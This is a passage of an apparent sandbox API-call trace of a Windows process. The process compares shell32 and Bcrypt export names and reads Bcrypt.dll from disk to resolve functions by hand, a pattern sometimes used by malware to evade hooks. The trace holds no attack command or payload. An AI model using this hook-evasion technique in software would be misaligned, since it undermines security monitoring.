lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle") returned 1 [0136.940] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage") returned 0 [0136.941] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="AppCompat_RunDLLW") returned 1 [0136.941] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="AssocCreateForClasses") returned 1 [0136.941] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="AssocGetDetailsOfPropKey") returned 1 [0136.941] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CDefFolderMenu_Create2") returned 1 [0136.941] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CIDLData_CreateFromIDArray") returned 1 [0136.941] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CStorageItem_GetValidatedStorageItemObject") returned 1 [0136.941] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CheckEscapesW") returned 1 [0136.941] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CommandLineToArgvW") returned 1 [0136.941] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="Control_RunDLL") returned 1 [0136.941] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="Control_RunDLLA") returned 1 [0136.941] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="Control_RunDLLAsUserW") returned 1 [0136.941] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="Control_RunDLLW") returned 1 [0136.941] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CreateStorageItemFromPath_FullTrustCaller") returned 1 [0136.941] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CreateStorageItemFromPath_FullTrustCaller_ForPackage") returned 1 [0136.941] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CreateStorageItemFromPath_PartialTrustCaller") returned 1 [0136.941] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CreateStorageItemFromShellItem_FullTrustCaller") returned 1 [0136.941] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage") returned 1 [0136.941] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle") returned 1 [0136.941] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage") returned 1 [0136.941] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="DAD_AutoScroll") returned 0 [0136.941] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="AppCompat_RunDLLW") returned 1 [0136.941] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="AssocCreateForClasses") returned 1 [0136.941] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="AssocGetDetailsOfPropKey") returned 1 [0136.942] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CDefFolderMenu_Create2") returned 1 [0136.942] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CIDLData_CreateFromIDArray") returned 1 [0136.942] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CStorageItem_GetValidatedStorageItemObject") returned 1 [0136.942] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CheckEscapesW") returned 1 [0136.942] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CommandLineToArgvW") returned 1 [0136.942] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="Control_RunDLL") returned 1 [0136.942] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="Control_RunDLLA") returned 1 [0136.942] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="Control_RunDLLAsUserW") returned 1 [0136.942] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="Control_RunDLLW") returned 1 [0136.942] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CreateStorageItemFromPath_FullTrustCaller") returned 1 [0136.942] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CreateStorageItemFromPath_FullTrustCaller_ForPackage") returned 1 [0136.942] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CreateStorageItemFromPath_PartialTrustCaller") returned 1 [0136.942] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CreateStorageItemFromShellItem_FullTrustCaller") returned 1 [0136.942] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage") returned 1 [0136.942] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle") returned 1 [0136.942] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage") returned 1 [0136.942] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="DAD_AutoScroll") returned 1 [0136.942] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="DAD_DragEnterEx") returned 0 [0136.942] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="AppCompat_RunDLLW") returned 1 [0136.942] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="AssocCreateForClasses") returned 1 [0136.942] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="AssocGetDetailsOfPropKey") returned 1 [0136.943] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CDefFolderMenu_Create2") returned 1 [0136.943] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CIDLData_CreateFromIDArray") returned 1 [0136.943] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CStorageItem_GetValidatedStorageItemObject") returned 1 [0136.943] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CheckEscapesW") returned 1 [0136.943] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CommandLineToArgvW") returned 1 [0136.943] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="Control_RunDLL") returned 1 [0136.943] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="Control_RunDLLA") returned 1 [0136.943] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="Control_RunDLLAsUserW") returned 1 [0136.943] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="Control_RunDLLW") returned 1 [0136.943] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CreateStorageItemFromPath_FullTrustCaller") returned 1 [0136.943] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CreateStorageItemFromPath_FullTrustCaller_ForPackage") returned 1 [0136.943] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CreateStorageItemFromPath_PartialTrustCaller") returned 1 [0136.943] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CreateStorageItemFromShellItem_FullTrustCaller") returned 1 [0136.943] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage") returned 1 [0136.943] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle") returned 1 [0137.244] GetProcessHeap () returned 0x530000 [0137.244] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x4117040 | out: hHeap=0x530000) returned 1 [0137.710] GetProcessHeap () returned 0x530000 [0137.710] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x10) returned 0x549200 [0137.710] LoadLibraryA (lpLibFileName="Bcrypt.dll") returned 0x7ffc5bcc0000 [0137.980] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0137.980] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0137.980] GetModuleFileNameA (in: hModule=0x7ffc5bcc0000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\SYSTEM32\\Bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll")) returned 0x1e [0137.980] CreateFileA (lpFileName="C:\\Windows\\SYSTEM32\\Bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0137.980] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0137.980] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0137.980] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=159648) returned 1 [0137.980] GetProcessHeap () returned 0x530000 [0137.980] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x26fa0) returned 0x2d52010 [0137.983] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0137.983] ReadFile (in: hFile=0x15c, lpBuffer=0x2d52010, nNumberOfBytesToRead=0x26fa0, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x2d52010*, lpNumberOfBytesRead=0x14f5a4*=0x26fa0, lpOverlapped=0x0) returned 1 [0137.987] CloseHandle (hObject=0x15c) returned 1 [0137.987] lstrcmpA (lpString1="BCryptAddContextFunction", lpString2="BCryptAddContextFunction") returned 0 [0137.987] lstrcmpA (lpString1="BCryptAddContextFunctionProvider", lpString2="BCryptAddContextFunction") returned 1 [0137.987] lstrcmpA (lpString1="BCryptAddContextFunctionProvider", lpString2="BCryptAddContextFunctionProvider") returned 0 [0137.987] lstrcmpA (lpString1="BCryptCloseAlgorithmProvider", lpString2="BCryptAddContextFunction") returned 1 [0137.987] lstrcmpA (lpString1="BCryptCloseAlgorithmProvider", lpString2="BCryptAddContextFunctionProvider") returned 1 [0137.988] lstrcmpA (lpString1="BCryptCloseAlgorithmProvider", lpString2="BCryptCloseAlgorithmProvider") returned 0 [0137.988] lstrcmpA (lpString1="BCryptConfigureContext", lpString2="BCryptAddContextFunction") returned 1 [0137.988] lstrcmpA (lpString1="BCryptConfigureContext", lpString2="BCryptAddContextFunctionProvider") returned 1 [0137.988] lstrcmpA (lpString1="BCryptConfigureContext", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0137.988] lstrcmpA (lpString1="BCryptConfigureContext", lpString2="BCryptConfigureContext") returned 0 [0137.988] lstrcmpA (lpString1="BCryptConfigureContextFunction", lpString2="BCryptAddContextFunction") returned 1 [0137.988] lstrcmpA (lpString1="BCryptConfigureContextFunction", lpString2="BCryptAddContextFunctionProvider") returned 1 [0137.988] lstrcmpA (lpString1="BCryptConfigureContextFunction", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0137.988] lstrcmpA (lpString1="BCryptConfigureContextFunction", lpString2="BCryptConfigureContext") returned 1 [0137.988] lstrcmpA (lpString1="BCryptConfigureContextFunction", lpString2="BCryptConfigureContextFunction") returned 0 [0137.988] lstrcmpA (lpString1="BCryptCreateContext", lpString2="BCryptAddContextFunction") returned 1 [0137.988] lstrcmpA (lpString1="BCryptCreateContext", lpString2="BCryptAddContextFunctionProvider") returned 1 [0137.988] lstrcmpA (lpString1="BCryptCreateContext", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0137.988] lstrcmpA (lpString1="BCryptCreateContext", lpString2="BCryptConfigureContext") returned 1 [0137.988] lstrcmpA (lpString1="BCryptCreateContext", lpString2="BCryptConfigureContextFunction") returned 1 [0137.988] lstrcmpA (lpString1="BCryptCreateContext", lpString2="BCryptCreateContext") returned 0 [0137.988] lstrcmpA (lpString1="BCryptCreateHash", lpString2="BCryptAddContextFunction") returned 1 [0137.988] lstrcmpA (lpString1="BCryptCreateHash", lpString2="BCryptAddContextFunctionProvider") returned 1 [0137.988] lstrcmpA (lpString1="BCryptCreateHash", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0137.988] lstrcmpA (lpString1="BCryptCreateHash", lpString2="BCryptConfigureContext") returned 1 [0137.988] lstrcmpA (lpString1="BCryptCreateHash", lpString2="BCryptConfigureContextFunction") returned 1 [0137.988] lstrcmpA (lpString1="BCryptCreateHash", lpString2="BCryptCreateContext") returned 1 [0137.988] lstrcmpA (lpString1="BCryptCreateHash", lpString2="BCryptCreateHash") returned 0 [0137.988] lstrcmpA (lpString1="BCryptCreateMultiHash", lpString2="BCryptAddContextFunction") returned 1 [0137.988] lstrcmpA (lpString1="BCryptCreateMultiHash", lpString2="BCryptAddContextFunctionProvider") returned 1 [0137.988] lstrcmpA (lpString1="BCryptCreateMultiHash", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0137.988] lstrcmpA (lpString1="BCryptCreateMultiHash", lpString2="BCryptConfigureContext") returned 1 [0137.988] lstrcmpA (lpString1="BCryptCreateMultiHash", lpString2="BCryptConfigureContextFunction") returned 1 [0137.989] lstrcmpA (lpString1="BCryptCreateMultiHash", lpString2="BCryptCreateContext") returned 1 [0137.989] lstrcmpA (lpString1="BCryptCreateMultiHash", lpString2="BCryptCreateHash") returned 1 [0137.989] lstrcmpA (lpString1="BCryptCreateMultiHash", lpString2="BCryptCreateMultiHash") returned 0 [0137.989] lstrcmpA (lpString1="BCryptDecrypt", lpString2="BCryptAddContextFunction") returned 1 [0137.989] lstrcmpA (lpString1="BCryptDecrypt", lpString2="BCryptAddContextFunctionProvider") returned 1 [0137.989] lstrcmpA (lpString1="BCryptDecrypt", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0137.989] lstrcmpA (lpString1="BCryptDecrypt", lpString2="BCryptConfigureContext") returned 1 [0137.989] lstrcmpA (lpString1="BCryptDecrypt", lpString2="BCryptConfigureContextFunction") returned 1 [0137.989] lstrcmpA (lpString1="BCryptDecrypt", lpString2="BCryptCreateContext") returned 1 [0137.989] lstrcmpA (lpString1="BCryptDecrypt", lpString2="BCryptCreateHash") returned 1 [0137.989] lstrcmpA (lpString1="BCryptDecrypt", lpString2="BCryptCreateMultiHash") returned 1 [0137.989] lstrcmpA (lpString1="BCryptDecrypt", lpString2="BCryptDecrypt") returned 0 [0137.989] lstrcmpA (lpString1="BCryptDeleteContext", lpString2="BCryptAddContextFunction") returned 1 [0137.989] lstrcmpA (lpString1="BCryptDeleteContext", lpString2="BCryptAddContextFunctionProvider") returned 1 [0137.989] lstrcmpA (lpString1="BCryptDeleteContext", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0137.989] lstrcmpA (lpString1="BCryptDeleteContext", lpString2="BCryptConfigureContext") returned 1 [0137.989] lstrcmpA (lpString1="BCryptDeleteContext", lpString2="BCryptConfigureContextFunction") returned 1 [0137.989] lstrcmpA (lpString1="BCryptDeleteContext", lpString2="BCryptCreateContext") returned 1 [0137.989] lstrcmpA (lpString1="BCryptDeleteContext", lpString2="BCryptCreateHash") returned 1 [0137.989] lstrcmpA (lpString1="BCryptDeleteContext", lpString2="BCryptCreateMultiHash") returned 1 [0137.989] lstrcmpA (lpString1="BCryptDeleteContext", lpString2="BCryptDecrypt") returned 1 [0137.989] lstrcmpA (lpString1="BCryptDeleteContext", lpString2="BCryptDeleteContext") returned 0 [0137.989] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptAddContextFunction") returned 1 [0137.989] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptAddContextFunctionProvider") returned 1 [0137.989] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0137.989] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptConfigureContext") returned 1 [0137.989] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptConfigureContextFunction") returned 1 [0137.989] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptCreateContext") returned 1 [0137.989] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptCreateHash") returned 1 [0137.989] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptCreateMultiHash") returned 1 [0137.989] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptDecrypt") returned 1 [0137.990] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptDeleteContext") returned 1 [0137.990] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptDeriveKey") returned 0 [0137.990] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptAddContextFunction") returned 1 [0137.990] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptAddContextFunctionProvider") returned 1 [0137.990] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0137.990] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptConfigureContext") returned 1 [0137.990] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptConfigureContextFunction") returned 1 [0137.990] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptCreateContext") returned 1 [0137.990] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptCreateHash") returned 1 [0137.990] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptCreateMultiHash") returned 1 [0137.990] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptDecrypt") returned 1 [0137.990] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptDeleteContext") returned 1 [0137.990] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptDeriveKey") returned 1 [0137.990] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptDeriveKeyCapi") returned 0 [0137.990] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptAddContextFunction") returned 1 [0137.990] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptAddContextFunctionProvider") returned 1 [0137.990] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0137.990] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptConfigureContext") returned 1 [0137.990] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptConfigureContextFunction") returned 1 [0137.990] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptCreateContext") returned 1 [0137.990] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptCreateHash") returned 1 [0137.990] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptCreateMultiHash") returned 1 [0137.990] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptDecrypt") returned 1 [0137.990] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptDeleteContext") returned 1 [0137.990] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptDeriveKey") returned 1 [0137.990] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptDeriveKeyCapi") returned 1 [0137.990] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptDeriveKeyPBKDF2") returned 0 [0137.990] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptAddContextFunction") returned 1 [0137.990] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptAddContextFunctionProvider") returned 1 [0137.990] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0137.990] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptConfigureContext") returned 1 [0137.990] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptConfigureContextFunction") returned 1 [0137.990] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptCreateContext") returned 1 [0137.991] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptCreateHash") returned 1 [0137.991] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptCreateMultiHash") returned 1 [0137.991] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptDecrypt") returned 1 [0137.991] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptDeleteContext") returned 1 [0137.991] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptDeriveKey") returned 1 [0137.991] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptDeriveKeyCapi") returned 1 [0137.991] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptDeriveKeyPBKDF2") returned 1 [0137.991] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptDestroyHash") returned 0 [0137.991] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptAddContextFunction") returned 1 [0137.991] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptAddContextFunctionProvider") returned 1 [0137.991] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0137.991] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptConfigureContext") returned 1 [0137.991] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptConfigureContextFunction") returned 1 [0137.991] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptCreateContext") returned 1 [0137.991] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptCreateHash") returned 1 [0137.991] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptCreateMultiHash") returned 1 [0137.991] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptDecrypt") returned 1 [0137.991] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptDeleteContext") returned 1 [0137.991] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptDeriveKey") returned 1 [0137.991] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptDeriveKeyCapi") returned 1 [0137.991] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptDeriveKeyPBKDF2") returned 1 [0137.991] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptDestroyHash") returned 1 [0137.991] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptDestroyKey") returned 0 [0137.991] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptAddContextFunction") returned 1 [0137.991] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptAddContextFunctionProvider") returned 1 [0137.991] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0137.991] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptConfigureContext") returned 1 [0137.991] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptConfigureContextFunction") returned 1 [0137.991] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptCreateContext") returned 1 [0137.991] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptCreateHash") returned 1 [0137.991] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptCreateMultiHash") returned 1 [0137.992] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptDecrypt") returned 1 [0137.992] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptDeleteContext") returned 1 [0137.992] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptDeriveKey") returned 1 [0137.992] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptDeriveKeyCapi") returned 1 [0137.992] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptDeriveKeyPBKDF2") returned 1 [0137.992] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptDestroyHash") returned 1 [0137.992] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptDestroyKey") returned 1 [0137.992] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptDestroySecret") returned 0 [0137.992] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptAddContextFunction") returned 1 [0137.992] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptAddContextFunctionProvider") returned 1 [0137.992] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0137.992] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptConfigureContext") returned 1 [0137.992] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptConfigureContextFunction") returned 1 [0137.992] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptCreateContext") returned 1 [0137.992] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptCreateHash") returned 1 [0137.992] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptCreateMultiHash") returned 1 [0137.992] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptDecrypt") returned 1 [0137.992] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptDeleteContext") returned 1 [0137.992] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptDeriveKey") returned 1 [0137.992] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptDeriveKeyCapi") returned 1 [0137.992] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptDeriveKeyPBKDF2") returned 1 [0137.992] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptDestroyHash") returned 1 [0137.992] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptDestroyKey") returned 1 [0137.992] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptDestroySecret") returned 1 [0137.992] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptDuplicateHash") returned 0 [0137.992] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptAddContextFunction") returned 1 [0137.992] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptAddContextFunctionProvider") returned 1 [0137.992] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0137.992] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptConfigureContext") returned 1 [0137.992] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptConfigureContextFunction") returned 1 [0137.992] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptCreateContext") returned 1 [0137.992] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptCreateHash") returned 1 [0137.992] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptCreateMultiHash") returned 1 [0137.992] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptDecrypt") returned 1 [0137.992] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptDeleteContext") returned 1 [0137.993] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptDeriveKey") returned 1 [0137.993] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptDeriveKeyCapi") returned 1 [0137.993] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptDeriveKeyPBKDF2") returned 1 [0137.993] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptDestroyHash") returned 1 [0137.993] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptDestroyKey") returned 1 [0137.993] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptDestroySecret") returned 1 [0137.993] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptDuplicateHash") returned 1 [0137.993] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptDuplicateKey") returned 0 [0137.993] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptAddContextFunction") returned 1 [0137.993] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptAddContextFunctionProvider") returned 1 [0137.993] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0137.993] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptConfigureContext") returned 1 [0137.993] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptConfigureContextFunction") returned 1 [0137.993] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptCreateContext") returned 1 [0137.993] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptCreateHash") returned 1 [0137.993] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptCreateMultiHash") returned 1 [0137.993] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptDecrypt") returned 1 [0137.993] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptDeleteContext") returned 1 [0137.993] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptDeriveKey") returned 1 [0137.993] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptDeriveKeyCapi") returned 1 [0137.993] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptDeriveKeyPBKDF2") returned 1 [0137.993] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptDestroyHash") returned 1 [0137.993] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptDestroyKey") returned 1 [0137.993] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptDestroySecret") returned 1 [0137.993] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptDuplicateHash") returned 1 [0137.993] lstrcmpA (lpString1="BCryptEncrypt", 